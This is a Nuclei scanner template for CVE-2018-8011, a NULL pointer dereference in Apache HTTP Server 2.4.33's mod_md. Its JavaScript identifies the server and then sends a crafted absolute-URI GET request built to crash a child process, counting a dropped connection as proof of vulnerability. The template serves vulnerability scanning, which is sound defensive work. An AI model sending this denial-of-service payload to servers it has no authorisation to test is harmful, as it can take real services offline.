id: CVE-2018-8011

info:
  name: Apache HTTP Server - NULL Pointer Dereference
  author: daffainfo
  severity: high
  description: |
    By specially crafting HTTP requests, the mod_md challenge handler would dereference a NULL pointer and cause the child process to segfault. This could be used to DoS the server. Fixed in Apache HTTP Server 2.4.34 (Affected 2.4.33)
  impact: |
    Attackers can cause server crashes leading to denial of service, disrupting service availability.
  remediation: |
    Update to version 2.4.34 or later.
  reference:
    - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2018-8011
    - https://nvd.nist.gov/vuln/detail/CVE-2018-8011
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2018-8011
    cwe-id: CWE-119
    epss-score: 0.77676
    epss-percentile: 0.99012
    cpe: cpe:2.3:a:apache:http_server:2.4.33:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: apache
    product: http_server
    shodan-query: cpe:"cpe:2.3:a:apache:http_server"
  tags: cve,cve2018,js,apache,httpd,dos,vkev

javascript:
  - code: |
      const c = require("nuclei/net");

      let conn;
      let address = `${Host}:${Port}`;
      let isApacheHttpServer = false;
      let isUp = false;

      let validRequest = `GET / HTTP/1.1\r\nHost: ${Host}\r\n\r\n`;
      let dosRequest = `GET http://${Host} HTTP/1.1\r\nHost: ${Host}\r\n\r\n`;

      // Make sure the response contains Apache/([0-9.]+)
      try {
        conn = c.OpenTLS('tcp', address);
      } catch {
        conn = c.Open('tcp', address);
      }
      conn.Send(validRequest);
      const result = conn.RecvString();
      const match = result.match(/Apache\/([0-9.]+)/);

      if (match) {
        isApacheHttpServer = true;
      } else {
        isApacheHttpServer = false;
      }

      // Send DoS Payload
      try {
        conn.Send(dosRequest);
        conn.RecvString();
        isUp = true;
      } catch {
        isUp = false;
      }
      conn.Close();

      if (isApacheHttpServer && !isUp) {
        Export("Vulnerable to CVE-2018-8011")
      } else {
        Export("Not Vulnerable")
      }

    args:
      Host: "{{Host}}"
      Port: 80,443 # if port not specified, defaults to both 80 and 443
      exclude-ports: "0" # override default skip list of 80,443,8080,8443

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Vulnerable to CVE-2018-8011'

      - type: dsl
        dsl:
          - success == true
# digest: 4b0a00483046022100f8febbd04c14bcc02af0a806b1c9a0153a4d22d8cb45615ef17373a6163449bb022100c015108e90b8ee7367f9ce07be76a383eed7aca869a7f761fe7041b662a961f7:922c64590222798bb761d5b6d8e72950